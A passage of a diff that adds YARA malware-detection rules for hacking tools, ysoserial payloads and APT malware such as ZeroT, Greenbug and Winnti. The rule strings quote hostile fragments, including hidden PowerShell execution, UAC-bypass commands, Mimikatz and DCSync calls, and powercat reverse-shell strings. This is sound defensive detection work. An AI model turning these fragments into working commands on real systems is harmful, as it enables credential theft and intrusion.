+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "59cdbb21d9e487ca82748168682f1f7af3c5f2b8daee3a09544dd58cbf51b0d5"
+      tags = "DEMO, EXE, FILE, HKTL, T1053, T1068, T1134"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Potato.exe -ip <ip>" fullword wide
+      $x2 = "-enable_httpserver true -enable_spoof true" fullword wide
+      $x3 = "/C schtasks.exe /Create /TN omg /TR" fullword wide
+      $x4 = "-enable_token true -enable_dce true" fullword wide
+      $x5 = "DNS lookup succeeds - UDP Exhaustion failed!" fullword wide
+      $x6 = "DNS lookup fails - UDP Exhaustion worked!" fullword wide
+      $x7 = "\\obj\\Release\\Potato.pdb" ascii
+      $x8 = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";" fullword wide
+      $s1 = "\"C:\\Windows\\System32\\cmd.exe\" /K start" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 2 of them )
+}
+
+rule Ysoserial_Payload_MozillaRhino1_RID335D : DEMO EXPLOIT FILE T1193 T1203 {
+   meta:
+      description = "Ysoserial Payloads - file MozillaRhino1.bin"
+      author = "Florian Roth"
+      reference = "https://github.com/frohoff/ysoserial"
+      date = "2017-02-04 14:44:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0143fee12fea5118be6dcbb862d8ba639790b7505eac00a9f1028481f874baa8"
+      tags = "DEMO, EXPLOIT, FILE, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "ysoserial.payloads" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xedac and filesize < 40KB and all of them )
+}
+
+rule Ysoserial_Payload_C3P0_RID2F4A : DEMO EXPLOIT FILE T1193 T1203 {
+   meta:
+      description = "Ysoserial Payloads - file C3P0.bin"
+      author = "Florian Roth"
+      reference = "https://github.com/frohoff/ysoserial"
+      date = "2017-02-04 11:50:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9932108d65e26d309bf7d97d389bc683e52e91eb68d0b1c8adfe318a4ec6e58b"
+      tags = "DEMO, EXPLOIT, FILE, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "exploitppppw" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xedac and filesize < 3KB and all of them )
+}
+
+rule Ysoserial_Payload_Spring1_RID30F8 : DEMO EXPLOIT T1193 T1203 {
+   meta:
+      description = "Ysoserial Payloads - file Spring1.bin"
+      author = "Florian Roth"
+      reference = "https://github.com/frohoff/ysoserial"
+      date = "2017-02-04 13:02:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2020-11-30"
+      hash1 = "bf9b5f35bc1556d277853b71da24faf23cf9964d77245018a0fdf3359f3b1703"
+      hash2 = "9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a"
+      hash3 = "8cfa85c16d37fb2c38f277f39cafb6f0c0bd7ee62b14d53ad1dd9cb3f4b25dd8"
+      tags = "DEMO, EXPLOIT, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "ysoserial/Pwner" ascii
+   condition: 
+      1 of them
+}
+
+rule Ysoserial_Payload_RID2DF5 : DEMO EXPLOIT FILE T1193 T1203 {
+   meta:
+      description = "Ysoserial Payloads"
+      author = "Florian Roth"
+      reference = "https://github.com/frohoff/ysoserial"
+      date = "2017-02-04 10:54:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a"
+      hash2 = "adf895fa95526c9ce48ec33297156dd69c3dbcdd2432000e61b2dd34ffc167c7"
+      hash3 = "1da04d838141c64711d87695a4cdb4eedfd4a206cc80922a41cfc82df8e24187"
+      tags = "DEMO, EXPLOIT, FILE, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "ysoserial/payloads/" ascii
+      $s1 = "StubTransletPayload" fullword ascii
+      $s2 = "Pwnrpw" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xedac and filesize < 40KB and $x1 ) or ( all of them )
+}
+
+rule Ysoserial_Payload_3_RID2E87 : DEMO EXPLOIT FILE T1193 T1203 {
+   meta:
+      description = "Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin"
+      author = "Florian Roth"
+      reference = "https://github.com/frohoff/ysoserial"
+      date = "2017-02-04 11:18:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f0d2f1095da0164c03a0e801bd50f2f06793fb77938e53b14b57fd690d036929"
+      hash2 = "5466d47363e11cd1852807b57d26a828728b9d5a0389214181b966bd0d8d7e56"
+      tags = "DEMO, EXPLOIT, FILE, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "ysoserialq" fullword ascii
+      $s1 = "targetClassInterceptorMetadatat" fullword ascii
+      $s2 = "targetInstancet" fullword ascii
+      $s3 = "targetClassL" fullword ascii
+      $s4 = "POST_ACTIVATEsr" fullword ascii
+      $s5 = "PRE_DESTROYsq" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xedac and filesize < 10KB and $x1 ) or ( all of them )
+}
+
+rule CN_APT_ZeroT_nflogger_RID2EEC : APT CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Chinese APT by Proofpoint ZeroT RAT  - file nflogger.dll"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+      date = "2017-02-04 11:35:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "946adbeb017616d56193a6d43fe9c583be6ad1c7f6a22bab7df9db42e6e8ab10"
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\LoaderDll.VS2010\\Release\\" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule CN_APT_ZeroT_extracted_Go_RID3071 : APT CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Chinese APT by Proofpoint ZeroT RAT  - file Go.exe"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+      date = "2017-02-04 12:40:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "83ddc69fe0d3f3d2f46df7e72995d59511c1bfcca1a4e14c330cb71860b4806b"
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "%s\\cmd.exe /c %s\\Zlh.exe" fullword ascii
+      $x2 = "\\BypassUAC.VS2010\\Release\\" ascii
+      $s1 = "Zjdsf.exe" fullword ascii
+      $s2 = "SS32prep.exe" fullword ascii
+      $s3 = "windowsgrep.exe" fullword ascii
+      $s4 = "Sysdug.exe" fullword ascii
+      $s5 = "Proessz.exe" fullword ascii
+      $s6 = "%s\\Zlh.exe" fullword ascii
+      $s7 = "/C %s\\%s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 7 of them )
+}
+
+rule CN_APT_ZeroT_extracted_Mcutil_RID3229 : APT CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Chinese APT by Proofpoint ZeroT RAT  - file Mcutil.dll"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+      date = "2017-02-04 13:53:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "266c06b06abbed846ebabfc0e683f5d20dadab52241bc166b9d60e9b8493b500"
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "LoaderDll.dll" fullword ascii
+      $s2 = "QageBox1USER" fullword ascii
+      $s3 = "xhmowl" fullword ascii
+      $s4 = "?KEYKY" fullword ascii
+      $s5 = "HH:mm:_s" fullword ascii
+      $s6 = "=licni] has maX0t" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 90KB and 3 of them ) or ( all of them )
+}
+
+rule PP_CN_APT_ZeroT_1_RID2CC8 : APT CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+      date = "2017-02-03 10:03:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "09061c603a32ac99b664f7434febfc8c1f9fd7b6469be289bb130a635a6c47c0"
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "suprise.exe" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule PP_CN_APT_ZeroT_2_RID2CC9 : APT CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+      date = "2017-02-03 10:04:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "74eb592ef7f5967b14794acdc916686e061a43169f06e5be4dca70811b9815df"
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "NO2-2016101902.exe" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule PP_CN_APT_ZeroT_3_RID2CCA : APT CHINA DEMO FILE MAL T1223 {
+   meta:
+      description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+      date = "2017-02-03 10:04:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ee2e2937128dac91a11e9bf55babc1a8387eb16cebe676142c885b2fc18669b2"
+      tags = "APT, CHINA, DEMO, FILE, MAL, T1223"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "/svchost.exe" fullword ascii
+      $s2 = "RasTls.dll" fullword ascii
+      $s3 = "20160620.htm" fullword ascii
+      $s4 = "* $l&$" fullword ascii
+      $s5 = "dfjhmh" fullword ascii
+      $s6 = "/20160620.htm" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5449 and filesize < 1000KB and 3 of them ) or ( all of them )
+}
+
+rule PP_CN_APT_ZeroT_4_RID2CCB : APT CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+      date = "2017-02-03 10:04:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a9519d2624a842d2c9060b64bb78ee1c400fea9e43d4436371a67cbf90e611b8"
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Mcutil.dll" fullword ascii
+      $s2 = "mcut.exe" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+}
+
+rule PP_CN_APT_ZeroT_5_RID2CCC : APT CHINA DEMO FILE MAL T1223 {
+   meta:
+      description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+      date = "2017-02-03 10:04:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "74dd52aeac83cc01c348528a9bcb20bbc34622b156f40654153e41817083ba1d"
+      tags = "APT, CHINA, DEMO, FILE, MAL, T1223"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "dbozcb" fullword ascii
+      $s1 = "nflogger.dll" fullword ascii
+      $s2 = "/svchost.exe" fullword ascii
+      $s3 = "1207.htm" fullword ascii
+      $s4 = "/1207.htm" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5449 and filesize < 1000KB and 1 of ( $x* ) and 1 of ( $s* ) ) or ( all of them )
+}
+
+rule PP_CN_APT_ZeroT_7_RID2CCE : APT CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+      date = "2017-02-03 10:04:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fc2d47d91ad8517a4a974c4570b346b41646fac333d219d2f1282c96b4571478"
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "RasTls.dll" fullword ascii
+      $s2 = "RasTls.exe" fullword ascii
+      $s4 = "LOADER ERROR" fullword ascii
+      $s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+}
+
+rule PP_CN_APT_ZeroT_8_RID2CCF : APT CHINA DEMO FILE MAL T1223 {
+   meta:
+      description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+      date = "2017-02-03 10:05:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4ef91c17b1415609a2394d2c6c353318a2503900e400aab25ab96c9fe7dc92ff"
+      tags = "APT, CHINA, DEMO, FILE, MAL, T1223"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "/svchost.exe" fullword ascii
+      $s2 = "RasTls.dll" fullword ascii
+      $s3 = "20160620.htm" fullword ascii
+      $s4 = "/20160620.htm" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5449 and filesize < 1000KB and 3 of them )
+}
+
+rule PP_CN_APT_ZeroT_9_RID2CD0 : APT CHINA DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+      author = "Florian Roth"
+      reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+      date = "2017-02-03 10:05:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a685cf4dca6a58213e67d041bba637dca9cb3ea6bb9ad3eae3ba85229118bce0"
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "nflogger.dll" fullword ascii
+      $s7 = "Zlh.exe" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+}
+
+rule UACME_Akagi_2_RID2B49 : DEMO EXE FILE HKTL T1183 {
+   meta:
+      description = "Detects Windows User Account Control Bypass - from files Akagi32.exe, Akagi64.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/hfiref0x/UACME"
+      date = "2017-02-03 09:00:01"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "caf744d38820accb48a6e50216e547ed2bb3979604416dbcfcc991ce5e18f4ca"
+      hash2 = "609e9b15114e54ffc40c05a8980cc90f436a4a77c69f3e32fe391c0b130ff1c5"
+      tags = "DEMO, EXE, FILE, HKTL, T1183"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Usage: Akagi.exe [Method] [OptionalParamToExecute]" fullword wide
+      $x2 = "[UCM] Target file already exists, abort" fullword wide
+      $s1 = "MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" fullword wide
+      $s2 = "Akagi.exe" fullword wide
+      $s3 = "Elevation:Administrator!new:{3AD05575-8857-4850-9277-11B85BDB8E09}" fullword wide
+      $s4 = "/c wusa %ws /extract:%%windir%%\\system32\\sysprep" fullword wide
+      $s5 = "/c wusa %ws /extract:%%windir%%\\system32\\migwiz" fullword wide
+      $s6 = "loadFrom=\"%systemroot%\\system32\\sysprep\\cryptbase.DLL\"" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 6 of them )
+}
+
+rule GoogleBot_UserAgent_RID2E80 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects the GoogleBot UserAgent String in an Executable"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-01-27 11:17:11"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" fullword ascii
+      $fp1 = "McAfee, Inc." wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and $x1 and not 1 of ( $fp* ) )
+}
+
+rule Greenbug_Malware_1_RID2DF8 : DEMO EXE FILE MAL MIDDLE_EAST {
+   meta:
+      description = "Detects Malware from Greenbug Incident"
+      author = "Florian Roth"
+      reference = "https://goo.gl/urp4CD"
+      date = "2017-01-25 10:54:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dab460a0b73e79299fbff2fa301420c1d97a36da7426acc0e903c70495db2b76"
+      tags = "DEMO, EXE, FILE, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "vailablez" fullword ascii
+      $s2 = "Sfouglr" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+}
+
+rule Greenbug_Malware_2_RID2DF9 : DEMO EXE FILE MAL MIDDLE_EAST T1047 {
+   meta:
+      description = "Detects Backdoor from Greenbug Incident"
+      author = "Florian Roth"
+      reference = "https://goo.gl/urp4CD"
+      date = "2017-01-25 10:54:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6b28a43eda5b6f828a65574e3f08a6d00e0acf84cbb94aac5cec5cd448a4649d"
+      hash2 = "21f5e60e9df6642dbbceca623ad59ad1778ea506b7932d75ea8db02230ce3685"
+      hash3 = "319a001d09ee9d754e8789116bbb21a3c624c999dae9cf83fde90a3fbe67ee6c"
+      tags = "DEMO, EXE, FILE, MAL, MIDDLE_EAST, T1047"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "|||Command executed successfully" fullword ascii
+      $x2 = "\\Release\\Bot Fresh.pdb" ascii
+      $x3 = "C:\\ddd\\a1.txt" fullword wide
+      $x4 = "Bots\\Bot5\\x64\\Release" ascii
+      $x5 = "Bot5\\Release\\Ism.pdb" ascii
+      $x6 = "Bot\\Release\\Ism.pdb" ascii
+      $x7 = "\\Bot Fresh\\Release\\Bot" ascii
+      $s1 = "/Home/SaveFile?commandId=CmdResult=" fullword wide
+      $s2 = "raB3G:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday" fullword ascii
+      $s3 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
+      $s4 = "SELECT * FROM AntiVirusProduct" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 3 of them )
+}
+
+rule Greenbug_Malware_4_RID2DFB : DEMO EXE FILE MAL MIDDLE_EAST {
+   meta:
+      description = "Detects ISMDoor Backdoor"
+      author = "Florian Roth"
+      reference = "https://goo.gl/urp4CD"
+      date = "2017-01-25 10:55:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
+      hash2 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
+      tags = "DEMO, EXE, FILE, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "powershell.exe -nologo -windowstyle hidden -c \"Set-ExecutionPolicy -scope currentuser" fullword ascii
+      $s2 = "powershell.exe -c \"Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . \"" fullword ascii
+      $s3 = "c:\\windows\\temp\\tmp8873" fullword ascii
+      $s4 = "taskkill /im winit.exe /f" fullword ascii
+      $s5 = "invoke-psuacme" 
+      $s6 = "-method oobe -payload \"\"" fullword ascii
+      $s7 = "C:\\ProgramData\\stat2.dat" fullword wide
+      $s8 = "Invoke-bypassuac" fullword ascii
+      $s9 = "Start Keylog Done" fullword wide
+      $s10 = "Microsoft\\Windows\\WinIt.exe" fullword ascii
+      $s11 = "Microsoft\\Windows\\Tmp9932u1.bat\"" fullword ascii
+      $s12 = "Microsoft\\Windows\\tmp43hh11.txt" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them ) or ( 3 of them )
+}
+
+rule Greenbug_Malware_5_RID2DFC : DEMO EXE FILE MAL MIDDLE_EAST T1047 T1087 {
+   meta:
+      description = "Detects Greenbug malware samples"
+      author = "Florian Roth"
+      reference = "https://goo.gl/urp4CD"
+      date = "2017-01-25 10:55:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
+      hash2 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49"
+      hash3 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c"
+      tags = "DEMO, EXE, FILE, MAL, MIDDLE_EAST, T1047, T1087"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "cmd /u /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter" fullword ascii
+      $x2 = "cmd /a /c net user administrator /domain >>" fullword ascii
+      $x3 = "cmd /a /c netstat -ant >>\"%localappdata%\\Microsoft\\" fullword ascii
+      $o1 = "========================== (Net User) ==========================" ascii fullword
+   condition: 
+      filesize < 2000KB and ( ( uint16 ( 0 ) == 0x5a4d and 1 of them ) or $o1 )
+}
+
+rule Winnti_fonfig_RID2C62 : CHINA DEMO EXE FILE G0044 MAL {
+   meta:
+      description = "Winnti sample - file fonfig.exe"
+      author = "Florian Roth"
+      reference = "https://goo.gl/VbvJtL"
+      date = "2017-01-25 09:46:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2c9882854a60c624ecf6b62b6c7cc7ed04cf4a29814aa5ed1f1a336854697641"
+      tags = "CHINA, DEMO, EXE, FILE, G0044, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "mciqtz.exe" fullword wide
+      $s2 = "knat9y7m" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule Winnti_NlaifSvc_RID2CFF : CHINA DEMO EXE FILE G0044 MAL {
+   meta:
+      description = "Winnti sample - file NlaifSvc.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/VbvJtL"
+      date = "2017-01-25 10:13:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5"
+      tags = "CHINA, DEMO, EXE, FILE, G0044, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "cracked by ximo" ascii
+      $s1 = "Yqrfpk" fullword ascii
+      $s2 = "IVVTOC" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 3 of them )
+}
+
+rule p0wnedPowerCat_RID2C84 : COBALTSTRIKE DEMO FILE HKTL {
+   meta:
+      description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPowerCat_RID2C84.cs"
+      author = "Florian Roth"
+      reference = "https://github.com/Cn33liz/p0wnedShell"
+      date = "2017-01-14 09:52:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6a3ba991d3b5d127c4325bc194b3241dde5b3a5853b78b4df1bce7cbe87c0fdf"
+      tags = "COBALTSTRIKE, DEMO, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Now if we point Firefox to http://127.0.0.1" fullword ascii
+      $x2 = "powercat -l -v -p" fullword ascii
+      $x3 = "P0wnedListener" fullword ascii
+      $x4 = "EncodedPayload.bat" fullword ascii
+      $x5 = "powercat -c " fullword ascii
+      $x6 = "Program.P0wnedPath()" ascii
+      $x7 = "Invoke-PowerShellTcpOneLine" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7375 and filesize < 150KB and 1 of them ) or ( 2 of them )
+}
+
+rule Hacktool_Strings_p0wnedShell_RID3234 : DEMO HKTL T1055 {
+   meta:
+      description = "Detects strings found in Runspace Post Exploitation Toolkit"
+      author = "Florian Roth"
+      reference = "https://github.com/Cn33liz/p0wnedShell"
+      date = "2017-01-14 13:55:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-07-29"
+      hash1 = "e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60"
+      type = "file"
+      tags = "DEMO, HKTL, T1055"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Invoke-TokenManipulation" fullword ascii
+      $x2 = "windows/meterpreter" fullword ascii
+      $x3 = "lsadump::dcsync" fullword ascii
+      $x4 = "p0wnedShellx86" fullword ascii
+      $x5 = "p0wnedShellx64" fullword ascii
+      $x6 = "Invoke_PsExec()" fullword ascii
+      $x7 = "Invoke-Mimikatz" fullword ascii
+      $x8 = "Invoke_Shellcode()" fullword ascii
+      $x9 = "Invoke-ReflectivePEInjection" ascii
+      $fp1 = "Sentinel Labs, Inc." wide
+      $fp2 = "Copyright Elasticsearch B.V." ascii wide
+      $fp3 = "Attack Information: Invoke-Mimikatz" ascii
+      $fp4 = "a30226 || INDICATOR-SHELLCODE Metasploit windows/meterpreter stage transfer attempt" 
+   condition: 
+      filesize < 20MB and 1 of ( $x* ) and not 1 of ( $fp* )
+}
+
+rule p0wnedPotato_RID2BD6 : COBALTSTRIKE DEMO HKTL {
+   meta:
+      description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPotato_RID2BD6.cs"
+      author = "Florian Roth"
+      reference = "https://github.com/Cn33liz/p0wnedShell"
+      date = "2017-01-14 09:23:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "aff2b694a01b48ef96c82daf387b25845abbe01073b76316f1aab3142fdb235b"
+      tags = "COBALTSTRIKE, DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Invoke-Tater" fullword ascii
+      $x2 = "P0wnedListener.Execute(WPAD_Proxy);" fullword ascii
+      $x3 = " -SpooferIP " ascii
+      $x4 = "TaterCommand()" ascii
+      $x5 = "FileName = \"cmd.exe\"," fullword ascii
+   condition: 
+      1 of them
+}
+
+rule p0wnedExploits_RID2CB7 : COBALTSTRIKE DEMO HKTL T1033 {
+   meta:
+      description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedExploits_RID2CB7.cs"
+      author = "Florian Roth"
+      reference = "https://github.com/Cn33liz/p0wnedShell"
+      date = "2017-01-14 10:01:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "54548e7848e742566f5596d8f02eca1fd2cbfeae88648b01efb7bab014b9301b"
+      tags = "COBALTSTRIKE, DEMO, HKTL, T1033"
+      minimum_yara = "1.7"
+      
+   strings:
